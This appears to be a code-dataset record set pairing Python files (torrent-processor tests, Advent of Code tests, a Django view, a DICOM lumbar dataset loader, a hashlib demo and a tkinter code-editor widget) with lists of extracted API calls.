[((380, 401), 'trdone.processor.Processor', 'Processor', (['None', 'None'], {}), '(None, None)\n', (389, 401), False, 'from trdone.processor import Processor\n'), ((419, 428), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (426, 428), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((651, 679), 'trdone.processor.Processor', 'Processor', (['None', 'destination'], {}), '(None, destination)\n', (660, 679), False, 'from trdone.processor import Processor\n'), ((698, 718), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {}), '()\n', (716, 718), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((973, 1001), 'trdone.processor.Processor', 'Processor', (['None', 'destination'], {}), '(None, destination)\n', (982, 1001), False, 'from trdone.processor import Processor\n'), ((1020, 1053), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'suffix': '""".rar"""'}), "(suffix='.rar')\n", (1038, 1053), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1248, 1257), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (1255, 1257), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1276, 1285), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (1283, 1285), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1308, 1350), 'tempfile.mkdtemp', 'mkdtemp', ([], {'prefix': '"""ignored_dir"""', 'dir': 'torrent'}), "(prefix='ignored_dir', dir=torrent)\n", (1315, 1350), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1371, 1422), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'prefix': '"""some_file"""', 'dir': 'torrent'}), "(prefix='some_file', dir=torrent)\n", (1389, 1422), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1442, 1488), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'suffix': '""".rar"""', 'dir': 'torrent'}), "(suffix='.rar', dir=torrent)\n", (1460, 1488), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((1509, 1540), 'trdone.processor.Processor', 'Processor', (['torrent', 'destination'], {}), '(torrent, destination)\n', (1518, 1540), False, 'from trdone.processor import Processor\n'), ((2027, 2036), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (2034, 2036), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2060, 2069), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (2067, 2069), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2088, 2113), 'tempfile.mkdtemp', 'mkdtemp', ([], {'dir': 'torrent_base'}), '(dir=torrent_base)\n', (2095, 2113), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2187, 2229), 'tempfile.mkdtemp', 'mkdtemp', ([], {'prefix': '"""ignored_dir"""', 'dir': 'torrent'}), "(prefix='ignored_dir', dir=torrent)\n", (2194, 2229), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2250, 2301), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'prefix': '"""some_file"""', 'dir': 'torrent'}), "(prefix='some_file', dir=torrent)\n", (2268, 2301), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2321, 2367), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'suffix': '""".rar"""', 'dir': 'torrent'}), "(suffix='.rar', dir=torrent)\n", (2339, 2367), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((2981, 2990), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (2988, 2990), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((3009, 3018), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (3016, 3018), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((3089, 3131), 'tempfile.mkdtemp', 'mkdtemp', ([], {'prefix': '"""ignored_dir"""', 'dir': 'torrent'}), "(prefix='ignored_dir', dir=torrent)\n", (3096, 3131), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((3152, 3203), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', ([], {'prefix': '"""some_file"""', 'dir': 'torrent'}), "(prefix='some_file', dir=torrent)\n", (3170, 3203), False, 'from tempfile import NamedTemporaryFile, mkdtemp\n'), ((3258, 3289), 'trdone.processor.Processor', 'Processor', (['torrent', 'destination'], {}), '(torrent, destination)\n', (3267, 3289), False, 'from trdone.processor import Processor\n'), ((519, 541), 'trdone.actions.NoAction', 'NoAction', (['source', 'None'], {}), '(source, None)\n', (527, 541), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((822, 859), 'trdone.actions.CopyAction', 'CopyAction', (['torrent.name', 'destination'], {}), '(torrent.name, destination)\n', (832, 859), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((1157, 1195), 'trdone.actions.UnrarAction', 'UnrarAction', (['torrent.name', 'destination'], {}), '(torrent.name, destination)\n', (1168, 1195), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((2939, 2957), 'os.path.realpath', 'realpath', (['__file__'], {}), '(__file__)\n', (2947, 2957), False, 'from os.path import basename, dirname, realpath\n'), ((3769, 3786), 'os.path.basename', 'basename', (['torrent'], {}), '(torrent)\n', (3777, 3786), False, 'from os.path import basename, dirname, realpath\n'), ((1713, 1751), 'trdone.actions.NoAction', 'NoAction', (['ignored_dir', 'new_torrent_dir'], {}), '(ignored_dir, new_torrent_dir)\n', (1721, 1751), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((1798, 1841), 'trdone.actions.CopyAction', 'CopyAction', (['some_file.name', 'new_torrent_dir'], {}), '(some_file.name, new_torrent_dir)\n', (1808, 1841), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((1888, 1931), 'trdone.actions.UnrarAction', 'UnrarAction', (['rar_file.name', 'new_torrent_dir'], {}), '(rar_file.name, new_torrent_dir)\n', (1899, 1931), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((2428, 2445), 'os.path.basename', 'basename', (['torrent'], {}), '(torrent)\n', (2436, 2445), False, 'from os.path import basename, dirname, realpath\n'), ((2647, 2685), 'trdone.actions.NoAction', 'NoAction', (['ignored_dir', 'new_torrent_dir'], {}), '(ignored_dir, new_torrent_dir)\n', (2655, 2685), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((2732, 2775), 'trdone.actions.CopyAction', 'CopyAction', (['some_file.name', 'new_torrent_dir'], {}), '(some_file.name, new_torrent_dir)\n', (2742, 2775), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((2822, 2865), 'trdone.actions.UnrarAction', 'UnrarAction', (['rar_file.name', 'new_torrent_dir'], {}), '(rar_file.name, new_torrent_dir)\n', (2833, 2865), False, 'from trdone.actions import NoAction, CopyAction, UnrarAction\n'), ((3446, 3463), 'os.path.basename', 'basename', (['torrent'], {}), '(torrent)\n', (3454, 3463), False, 'from os.path import basename, dirname, realpath\n'), ((3467, 3487), 'os.listdir', 'listdir', (['destination'], {}), '(destination)\n', (3474, 3487), False, 'from os import listdir\n'), ((3513, 3537), 'os.path.basename', 'basename', (['some_file.name'], {}), '(some_file.name)\n', (3521, 3537), False, 'from os.path import basename, dirname, realpath\n')]
|
import os
from pathlib import Path
from typing import List
from aoc_2018.day_3.python.day3_puzzle1 import (
Claim,
find_square_inches_with_overlapping_claims,
parse_claim,
)
def get_input(input_file_name: str) -> List[Claim]:
input_file_path: str = os.path.join(Path(os.path.dirname(__file__)).parent, input_file_name)
claims: List[Claim] = []
with open(input_file_path) as input_file:
claims = [parse_claim(claim_str) for claim_str in input_file]
return claims
def test_find_square_inches_with_multiple_claims_simple() -> None:
assert find_square_inches_with_overlapping_claims(get_input("puzzle1_simple_input.txt")) == 4
def test_find_square_inches_with_multiple_claims_complex() -> None:
assert find_square_inches_with_overlapping_claims(get_input("puzzle_input.txt")) == 107663
|
[
"aoc_2018.day_3.python.day3_puzzle1.parse_claim",
"os.path.dirname"
] |
[((433, 455), 'aoc_2018.day_3.python.day3_puzzle1.parse_claim', 'parse_claim', (['claim_str'], {}), '(claim_str)\n', (444, 455), False, 'from aoc_2018.day_3.python.day3_puzzle1 import Claim, find_square_inches_with_overlapping_claims, parse_claim\n'), ((286, 311), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (301, 311), False, 'import os\n')]
|
import os
for i in range(28):
print("Test case: ", i)
os.system(f"echo {i} | ./a.out | grep \"Enter\"")
|
[
"os.system"
] |
[((58, 105), 'os.system', 'os.system', (['f"""echo {i} | ./a.out | grep "Enter\\""""'], {}), '(f\'echo {i} | ./a.out | grep "Enter"\')\n', (67, 105), False, 'import os\n')]
|
# coding=utf-8
import traceback
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import permission_required
from django.contrib.messages.views import SuccessMessageMixin
from django.core.urlresolvers import reverse
from django.views.generic.edit import CreateView
from modules.employee_management.employee_info.models import Employee
from modules.share_module.permissionMixin import class_view_decorator
from modules.social_security.reduction_info.models import Reduction
@class_view_decorator(login_required)
@class_view_decorator(permission_required('reduction_info.add_reduction', raise_exception=True))
class ReductionCreate(SuccessMessageMixin, CreateView):
model = Reduction
template_name = "base/document_edit.html"
fields = ["emplyid", "remark", "remark1", "remark2"]
success_message = u"%(emplyid)s ๆๅๅๅปบ"
def get_success_url(self):
self.url = reverse('reduction_info:reduction_list', args=())
referrer = self.request.POST.get("referrer", "")
# if referrer:
# self.url = referrer
_addanother = self.request.POST.get("_addanother", "")
if _addanother:
self.url = reverse('reduction_info:reduction_add')
return self.url
# ๅขๅ ่ฟๅๅๆฐ
def get_context_data(self, **kwargs):
context = super(ReductionCreate, self).get_context_data(**kwargs)
context["form_content"] = u"ๆฐๅขๅๅไฟกๆฏ"
referrer = self.request.META.get('HTTP_REFERER', "")
context["referrer"] = referrer
return context
def form_valid(self, form):
# ๆ ก้ชๅฝๅ็ปๅฝ็จๆท๏ผไธๆฏๅฝๅ
ฅ้กน็ฎ็่ด่ดฃไบบๆฏ๏ผ้ปๆญขๅฝๅ
ฅ
try:
login_user = self.request.user
emplyid = self.request.POST.get("emplyid", 0) # ๅๅทฅ็ผๅท
if not emplyid:
messages.warning(self.request, u"่ฏท้ๆฉๆจๆ่ด่ดฃ็โๅๅทฅ็ผๅทโ")
return super(ReductionCreate, self).form_invalid(form)
emp_obj = Employee.objects.filter(id=emplyid)
principal = ""
if emp_obj.exists():
principal = emp_obj[0].project_name.principal
if login_user != principal:
messages.warning(self.request, u"่ฏท้ๆฉๆจๆ่ด่ดฃ็โๅๅทฅ็ผๅทโ")
return super(ReductionCreate, self).form_invalid(form)
except:
traceback.print_exc()
return super(ReductionCreate, self).form_valid(form)
|
[
"traceback.print_exc",
"django.core.urlresolvers.reverse",
"django.contrib.auth.decorators.permission_required",
"modules.employee_management.employee_info.models.Employee.objects.filter",
"modules.share_module.permissionMixin.class_view_decorator",
"django.contrib.messages.warning"
] |
[((558, 594), 'modules.share_module.permissionMixin.class_view_decorator', 'class_view_decorator', (['login_required'], {}), '(login_required)\n', (578, 594), False, 'from modules.share_module.permissionMixin import class_view_decorator\n'), ((617, 690), 'django.contrib.auth.decorators.permission_required', 'permission_required', (['"""reduction_info.add_reduction"""'], {'raise_exception': '(True)'}), "('reduction_info.add_reduction', raise_exception=True)\n", (636, 690), False, 'from django.contrib.auth.decorators import permission_required\n'), ((945, 994), 'django.core.urlresolvers.reverse', 'reverse', (['"""reduction_info:reduction_list"""'], {'args': '()'}), "('reduction_info:reduction_list', args=())\n", (952, 994), False, 'from django.core.urlresolvers import reverse\n'), ((1178, 1217), 'django.core.urlresolvers.reverse', 'reverse', (['"""reduction_info:reduction_add"""'], {}), "('reduction_info:reduction_add')\n", (1185, 1217), False, 'from django.core.urlresolvers import reverse\n'), ((1801, 1836), 'modules.employee_management.employee_info.models.Employee.objects.filter', 'Employee.objects.filter', ([], {'id': 'emplyid'}), '(id=emplyid)\n', (1824, 1836), False, 'from modules.employee_management.employee_info.models import Employee\n'), ((1678, 1727), 'django.contrib.messages.warning', 'messages.warning', (['self.request', 'u"""่ฏท้ๆฉๆจๆ่ด่ดฃ็โๅๅทฅ็ผๅทโ"""'], {}), "(self.request, u'่ฏท้ๆฉๆจๆ่ด่ดฃ็โๅๅทฅ็ผๅทโ')\n", (1694, 1727), False, 'from django.contrib import messages\n'), ((1964, 2013), 'django.contrib.messages.warning', 'messages.warning', (['self.request', 'u"""่ฏท้ๆฉๆจๆ่ด่ดฃ็โๅๅทฅ็ผๅทโ"""'], {}), "(self.request, u'่ฏท้ๆฉๆจๆ่ด่ดฃ็โๅๅทฅ็ผๅทโ')\n", (1980, 2013), False, 'from django.contrib import messages\n'), ((2086, 2107), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2105, 2107), False, 'import traceback\n')]
|
import json
import os
import SimpleITK as sitk
import numpy
import pydicom
import numpy as np
from ltr.admin.environment import env_settings
from ltr.data.processing_utils import str_analyse
from ltr.dataset.base_dataset import BaseDataset
from pydoctor.evaluation import Study
from pydoctor.evaluation.data import StudyList
def _read_file(path):
with open(path, 'r') as f:
json_file = json.loads(f.read())
return json_file
class Lumbar3d(BaseDataset):
"""
The Lumbar dataset from official TianChi competition.
organized as follows.
-lumbar
-lumbar_testA50
-study...
-lumbar_train150
-study...
-lumbar_train51
-study...
lumbar_train150_annotation.json
lumbar_train51_annotation.json
"""
def __init__(self, root=None, split='train'):
"""
args:
:param root:path to the lumbar dataset.
:param split: string name 'train','val','test'
"""
root = env_settings().lumbar_dir if root is None else root
super().__init__('lumbar', root)
# dataset split for competition.
if split == 'train':
self.studies_path = os.path.join(root, 'DatasetA','lumbar_train150')
self.anno_path = os.path.join(root, 'DatasetA','lumbar_train150_annotation.json')
self.anno_meta = self._load_anno(self.anno_path)
elif split == 'val':
self.studies_path = os.path.join(root, 'DatasetA','lumbar_train51')
self.anno_path = os.path.join(root, 'DatasetA','lumbar_train51_annotation.json')
self.anno_meta = self._load_anno(self.anno_path)
elif split == 'testA':
self.studies_path = os.path.join(root,'datasetA','lumbar_testA50')
elif split == 'testB':
self.studies_path = os.path.join(root, 'datasetB', 'lumbar_testB50')
else:
raise ValueError('Unknow split name.')
# All folders inside the root.
self.study_list = self._get_study_list()
self.body_id = {'L1':0,'L2':1,'L3':2,'L4':3,'L5':4}
self.body_class = {'V1':0,'V2':1}
self.disc_id = {'T12-L1':0,'L1-L2':1,'L2-L3':2,'L3-L4':3,'L4-L5':4,'L5-S1':5}
self.disc_class = {'V1':0,'V2':1,'V3':2,'V4':3,'V5':4}
def _get_study_list(self):
return os.listdir(self.studies_path)
def get_name(self):
return 'lumbar'
def _get_study_path(self, std_id):
return os.path.join(self.studies_path, self.study_list[std_id])
def _get_key_image_info(self, folder,frame_num=3):
global key_image_path
reader = sitk.ImageSeriesReader()
file_path = os.path.join(folder, os.listdir(folder)[0])
study_uid = pydicom.read_file(file_path).get(0x0020000d).value
study_meta = self.anno_meta[str(study_uid)]
dicom_path_list = reader.GetGDCMSeriesFileNames(folder, study_meta['seriesUid'])
dicom_slice = [[pydicom.read_file(file), file] for file in dicom_path_list]
dicom_slice.sort(key=lambda x: float(x[0].ImagePositionPatient[0]))
data_path = dicom_slice[len(dicom_path_list) // 2][1]
middile_index = study_meta['point'][0]['zIndex']
frame_list = []
for dcm_path in range(middile_index - frame_num // 2,middile_index + frame_num // 2 + 1,1):
frame_list.append(np.squeeze(sitk.GetArrayFromImage(sitk.ReadImage(dicom_slice[dcm_path][1]))))
key_image = numpy.stack(frame_list,axis=0)
key_image = np.uint8((key_image - key_image.min()) / (key_image.max() - key_image.min()) * 255.0)
return key_image, study_meta['point']
def _load_anno(self, anno_path):
anno_list = _read_file(anno_path)
anno_dict = {}
for anno in anno_list:
tmp_dict = {anno['studyUid']: {'seriesUid': anno['data'][0]['seriesUid'],
'instanceUid': anno['data'][0]['instanceUid'],
'point': anno['data'][0]['annotation'][0]['data']['point']}}
anno_dict.update(tmp_dict)
return anno_dict
def _deal_point_dict(self,point_list):
body_dict,disc_dict = {},{}
for ann in point_list:
coord = ann.get('coord',None)
identification = ann['tag'].get('identification',None)
if identification in self.body_id:
class_num = self.body_class[str_analyse(ann['tag'].get('vertebra','v1').upper())]
body_dict.update({identification:{'coord':coord,'class_num':class_num}})
elif identification in self.disc_id:
class_num = self.disc_class[str_analyse(ann['tag'].get('disc','v1').upper())]
disc_dict.update({identification:{'coord':coord,'class_num':class_num}})
return body_dict, disc_dict
def get_frames(self, std_id, frame_num=5,anno=None):
dicom_folder = self._get_study_path(std_id)
key_frame,point_list = self._get_key_image_info(dicom_folder)
body_dict, disc_dict = self._deal_point_dict(point_list)
return key_frame, body_dict, disc_dict
def get_study_list(self):
return StudyList([self._construct_study(s) for s in self.study_list])
def _construct_study(self,study_name):
study_folder_path = os.path.join(self.studies_path,study_name)
# series_ids = sitk.ImageSeriesReader.GetGDCMSeriesIDs(study_folder_path)
# for id in series_ids:
file_list = [os.path.join(study_folder_path,i) for i in os.listdir(study_folder_path)]
dicom_slice = [[pydicom.read_file(file),file]for file in file_list]
dicom_slice.sort(key=lambda x:float(x[0].ImagePositionPatient[0]))
data_path = dicom_slice[len(file_list)//2][1]
return Study(name=study_name,dataset='lumbar_test',frame_path=data_path,index=len(file_list)//2)
|
[
"numpy.stack",
"pydicom.read_file",
"SimpleITK.ReadImage",
"ltr.admin.environment.env_settings",
"os.path.join",
"os.listdir",
"SimpleITK.ImageSeriesReader"
] |
[((2384, 2413), 'os.listdir', 'os.listdir', (['self.studies_path'], {}), '(self.studies_path)\n', (2394, 2413), False, 'import os\n'), ((2518, 2574), 'os.path.join', 'os.path.join', (['self.studies_path', 'self.study_list[std_id]'], {}), '(self.studies_path, self.study_list[std_id])\n', (2530, 2574), False, 'import os\n'), ((2678, 2702), 'SimpleITK.ImageSeriesReader', 'sitk.ImageSeriesReader', ([], {}), '()\n', (2700, 2702), True, 'import SimpleITK as sitk\n'), ((3510, 3541), 'numpy.stack', 'numpy.stack', (['frame_list'], {'axis': '(0)'}), '(frame_list, axis=0)\n', (3521, 3541), False, 'import numpy\n'), ((5368, 5411), 'os.path.join', 'os.path.join', (['self.studies_path', 'study_name'], {}), '(self.studies_path, study_name)\n', (5380, 5411), False, 'import os\n'), ((1243, 1292), 'os.path.join', 'os.path.join', (['root', '"""DatasetA"""', '"""lumbar_train150"""'], {}), "(root, 'DatasetA', 'lumbar_train150')\n", (1255, 1292), False, 'import os\n'), ((1321, 1386), 'os.path.join', 'os.path.join', (['root', '"""DatasetA"""', '"""lumbar_train150_annotation.json"""'], {}), "(root, 'DatasetA', 'lumbar_train150_annotation.json')\n", (1333, 1386), False, 'import os\n'), ((5546, 5580), 'os.path.join', 'os.path.join', (['study_folder_path', 'i'], {}), '(study_folder_path, i)\n', (5558, 5580), False, 'import os\n'), ((1047, 1061), 'ltr.admin.environment.env_settings', 'env_settings', ([], {}), '()\n', (1059, 1061), False, 'from ltr.admin.environment import env_settings\n'), ((1508, 1556), 'os.path.join', 'os.path.join', (['root', '"""DatasetA"""', '"""lumbar_train51"""'], {}), "(root, 'DatasetA', 'lumbar_train51')\n", (1520, 1556), False, 'import os\n'), ((1585, 1649), 'os.path.join', 'os.path.join', (['root', '"""DatasetA"""', '"""lumbar_train51_annotation.json"""'], {}), "(root, 'DatasetA', 'lumbar_train51_annotation.json')\n", (1597, 1649), False, 'import os\n'), ((2744, 2762), 'os.listdir', 'os.listdir', (['folder'], {}), '(folder)\n', (2754, 2762), False, 'import os\n'), ((3003, 3026), 'pydicom.read_file', 'pydicom.read_file', (['file'], {}), '(file)\n', (3020, 3026), False, 'import pydicom\n'), ((5589, 5618), 'os.listdir', 'os.listdir', (['study_folder_path'], {}), '(study_folder_path)\n', (5599, 5618), False, 'import os\n'), ((5644, 5667), 'pydicom.read_file', 'pydicom.read_file', (['file'], {}), '(file)\n', (5661, 5667), False, 'import pydicom\n'), ((1773, 1821), 'os.path.join', 'os.path.join', (['root', '"""datasetA"""', '"""lumbar_testA50"""'], {}), "(root, 'datasetA', 'lumbar_testA50')\n", (1785, 1821), False, 'import os\n'), ((2787, 2815), 'pydicom.read_file', 'pydicom.read_file', (['file_path'], {}), '(file_path)\n', (2804, 2815), False, 'import pydicom\n'), ((1883, 1931), 'os.path.join', 'os.path.join', (['root', '"""datasetB"""', '"""lumbar_testB50"""'], {}), "(root, 'datasetB', 'lumbar_testB50')\n", (1895, 1931), False, 'import os\n'), ((3446, 3486), 'SimpleITK.ReadImage', 'sitk.ReadImage', (['dicom_slice[dcm_path][1]'], {}), '(dicom_slice[dcm_path][1])\n', (3460, 3486), True, 'import SimpleITK as sitk\n')]
|
import hashlib
# initialize a string
str = "Crypto"
# encode the string
encoded_str = str.encode()
# create sha-2 hash objects initialized with the encoded string
hash_obj_sha224 = hashlib.sha224(encoded_str) # SHA224
hash_obj_sha256 = hashlib.sha256(encoded_str) # SHA256
hash_obj_sha384 = hashlib.sha384(encoded_str) # SHA384
hash_obj_sha512 = hashlib.sha512(encoded_str) # SHA512
# print
print("\nSHA224 Hash: ", hash_obj_sha224.hexdigest())
print("\nSHA256 Hash: ", hash_obj_sha256.hexdigest())
print("\nSHA384 Hash: ", hash_obj_sha384.hexdigest())
print("\nSHA512 Hash: ", hash_obj_sha512.hexdigest())
|
[
"hashlib.sha256",
"hashlib.sha224",
"hashlib.sha512",
"hashlib.sha384"
] |
[((190, 217), 'hashlib.sha224', 'hashlib.sha224', (['encoded_str'], {}), '(encoded_str)\n', (204, 217), False, 'import hashlib\n'), ((247, 274), 'hashlib.sha256', 'hashlib.sha256', (['encoded_str'], {}), '(encoded_str)\n', (261, 274), False, 'import hashlib\n'), ((304, 331), 'hashlib.sha384', 'hashlib.sha384', (['encoded_str'], {}), '(encoded_str)\n', (318, 331), False, 'import hashlib\n'), ((361, 388), 'hashlib.sha512', 'hashlib.sha512', (['encoded_str'], {}), '(encoded_str)\n', (375, 388), False, 'import hashlib\n')]
|
from .widget import Widget
import tkinter as tk
from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox
from tkinter.constants import RIGHT, LEFT, Y, BOTH
from tkinter.font import Font, BOLD, nametofont
from .scroll_frame import AutoScrollbar
from pygments.styles import get_style_by_name
from pygments.lexers import get_lexer_by_name
from ttkwidgets.autocomplete import AutocompleteEntryListbox
class ScrolledText(Text):
def __init__(self, master=None, **kw):
self.frame = Frame(master)
self.vbar = AutoScrollbar(self.frame, orient="vertical")
self.vbar.grid(row=0, column=1, sticky="ns")
self.frame.grid_columnconfigure(0, weight=1)
self.frame.grid_columnconfigure(1, weight=0)
self.frame.grid_rowconfigure(0, weight=1)
kw.update({'yscrollcommand': self.vbar.set})
Text.__init__(self, self.frame, **kw)
self.vbar['command'] = self.yview
Text.grid(self, row=0, column=0, sticky="news")
# Copy geometry methods of self.frame without overriding Text
# methods -- hack!
text_meths = vars(Text).keys()
methods = vars(Pack).keys() | vars(Grid).keys() | vars(Place).keys()
methods = methods.difference(text_meths)
for m in methods:
if m[0] != '_' and m != 'config' and m != 'configure' and m not in ["grid", "pack"]:
setattr(self, m, getattr(self.frame, m))
def __str__(self):
return str(self.frame)
def pack(self, *args, **kwargs):
self.frame.pack(*args, **kwargs)
#self.frame.pack_propagate(False)
def grid(self, *args, **kwargs):
self.frame.grid(*args, **kwargs)
class TextArea(Widget):
def __init__(self, master, **kwargs):
super().__init__(tk=ScrolledText(master=master, wrap=tk.WORD), **kwargs)
self._spaces = ' '
self._lexer = None
self._lexer_style = None
self._autocomplete_list = None
self._tk.bind('<KeyRelease>', self._set_data)
self._tk.bind('<Tab>', self._tab_to_spaces)
self._tk.bind('<Return>', self._autoindent)
self._tk.bind("<Control-KeyRelease-plus>", self._increase_size)
self._tk.bind("<Control-KeyRelease-minus>", self._decrease_size)
self._tk.bind("<Control-KeyRelease-space>", self._autocomplete)
self._value_setter = self.connect_to_prop("value", self.on_changed_value)
self.connect_to_prop("spaces", self._on_changed_spaces)
self.connect_to_prop("language", self._on_changed_language)
self.connect_to_prop("highlightstyle", self._on_changed_highlightstyle)
self.connect_to_prop("autocomplete", self._on_changed_autocomplete)
def _on_changed_autocomplete(self, value):
self._autocomplete_list = value
def _autocomplete(self, event):
if not self._autocomplete_list or len(self._autocomplete_list) == 0:
return
index = self._tk.index(INSERT).split(".")
self._text_index = '.'.join(index)
tw = Toplevel(self._tk)
tw.wm_overrideredirect(True)
font = self._get_font()
font_size = int(font.cget("size"))
tw.geometry(f"+{ self._tk.winfo_rootx() + int(index[1]) * int(font_size / 2) }+{ self._tk.winfo_rooty() + int(index[0]) * font_size }")
self._listbox = AutocompleteEntryListbox(tw, font=font, allow_other_values=False, completevalues=[v["name"] for v in self._autocomplete_list])
self._listbox.pack()
tw.lift()
tw.focus_force()
tw.grab_set()
tw.grab_release()
self._listbox.focus_force()
self._listbox.listbox.bind("<Double-Button-1>", self._autocomplete_selected)
self._listbox.entry.bind("<Return>", self._autocomplete_selected)
self._listbox.bind("<Leave>", self._autocomplete_destroy)
self._listbox.bind("<Escape>", self._autocomplete_destroy)
self._autocomplete_window = tw
def _autocomplete_selected(self, event):
value = next(v["value"] for v in self._autocomplete_list if v["name"] == self._listbox.get())
self._tk.insert(self._text_index, value)
self._listbox.event_generate("<Leave>")
def _autocomplete_destroy(self, event):
if self._autocomplete_window:
self._autocomplete_window.destroy()
self._autocomplete_window = None
self._tk.focus_force()
self._tk.mark_set("insert", self._text_index)
def _get_font(self):
return nametofont(self.get_style_attr('font'))
def _increase_size(self, event):
font = self._get_font()
font.configure(size=int(font.cget("size") + 1))
#self._tk.configure(font=font)
def _decrease_size(self, event):
font = self._get_font()
font.configure(size=int(font.cget("size") - 1))
#self._tk.configure(font=font)
def _highlight(self):
if not self._lexer:
return
code = self._get_text()
self._tk.mark_set("range_start", "1" + ".0")
for token, value in self._lexer.get_tokens(code):
if len(value) == 0:
continue
self._tk.mark_set("range_end", "range_start + %dc" % len(value))
self._tk.tag_add(str(token), "range_start", "range_end")
self._tk.mark_set("range_start", "range_end")
def _on_changed_highlightstyle(self, value):
self._lexer_style = get_style_by_name(value)
self._tk.configure(
background=self._lexer_style.background_color,
insertbackground=self._lexer_style.highlight_color,
foreground=self._lexer_style.highlight_color)
for tag in self._tk.tag_names():
self._tk.tag_delete(tag)
for token, value in self._lexer_style.styles.items():
token_value = value.split(' ')
foreground = list(filter(lambda x: x.startswith("#"), token_value))
if len(foreground) == 0:
continue
if str(token) == "Token.Text":
self._tk.configure(
insertbackground=foreground[0],
foreground=foreground[0])
self._tk.tag_configure(str(token), foreground=foreground[0])
self._highlight()
def _on_changed_language(self, value):
if value:
self._lexer = get_lexer_by_name(value)
def _on_changed_spaces(self, value):
self._spaces = ''.join([" "] * int(value))
def _autoindent(self, event):
indentation = ""
lineindex = self._tk.index("insert").split(".")[0]
linetext = self._tk.get(lineindex+".0", lineindex+".end")
for character in linetext:
if character in [" ","\t"]:
indentation += character
else:
break
self._tk.insert(self._tk.index("insert"), "\n"+indentation)
return "break"
def _tab_to_spaces(self, event):
self._tk.insert(self._tk.index("insert"), self._spaces)
return "break"
def _get_text(self):
return self._tk.get("1.0", tk.END)[:-1]
def _set_data(self, event):
if self._value_setter:
self._value_setter(self._get_text())
def on_changed_value(self, value):
if value:
index = self._tk.index(tk.INSERT)
self._tk.delete("1.0", tk.END)
self._tk.insert(tk.END, value)
self._tk.mark_set("insert", index)
self._tk.see(index)
self._highlight()
def on_disposed(self):
self._tk.unbind('<KeyRelease>')
|
[
"tkinter.Text.__init__",
"tkinter.Text.grid",
"pygments.lexers.get_lexer_by_name",
"tkinter.Toplevel",
"ttkwidgets.autocomplete.AutocompleteEntryListbox",
"tkinter.Frame",
"pygments.styles.get_style_by_name"
] |
[((598, 611), 'tkinter.Frame', 'Frame', (['master'], {}), '(master)\n', (603, 611), False, 'from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox\n'), ((928, 965), 'tkinter.Text.__init__', 'Text.__init__', (['self', 'self.frame'], {}), '(self, self.frame, **kw)\n', (941, 965), False, 'from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox\n'), ((1010, 1057), 'tkinter.Text.grid', 'Text.grid', (['self'], {'row': '(0)', 'column': '(0)', 'sticky': '"""news"""'}), "(self, row=0, column=0, sticky='news')\n", (1019, 1057), False, 'from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox\n'), ((3004, 3022), 'tkinter.Toplevel', 'Toplevel', (['self._tk'], {}), '(self._tk)\n', (3012, 3022), False, 'from tkinter import Frame, Text, Scrollbar, Pack, Grid, Place, INSERT, END, Toplevel, Listbox\n'), ((3294, 3424), 'ttkwidgets.autocomplete.AutocompleteEntryListbox', 'AutocompleteEntryListbox', (['tw'], {'font': 'font', 'allow_other_values': '(False)', 'completevalues': "[v['name'] for v in self._autocomplete_list]"}), "(tw, font=font, allow_other_values=False,\n completevalues=[v['name'] for v in self._autocomplete_list])\n", (3318, 3424), False, 'from ttkwidgets.autocomplete import AutocompleteEntryListbox\n'), ((5280, 5304), 'pygments.styles.get_style_by_name', 'get_style_by_name', (['value'], {}), '(value)\n', (5297, 5304), False, 'from pygments.styles import get_style_by_name\n'), ((6140, 6164), 'pygments.lexers.get_lexer_by_name', 'get_lexer_by_name', (['value'], {}), '(value)\n', (6157, 6164), False, 'from pygments.lexers import get_lexer_by_name\n')]
|
import json
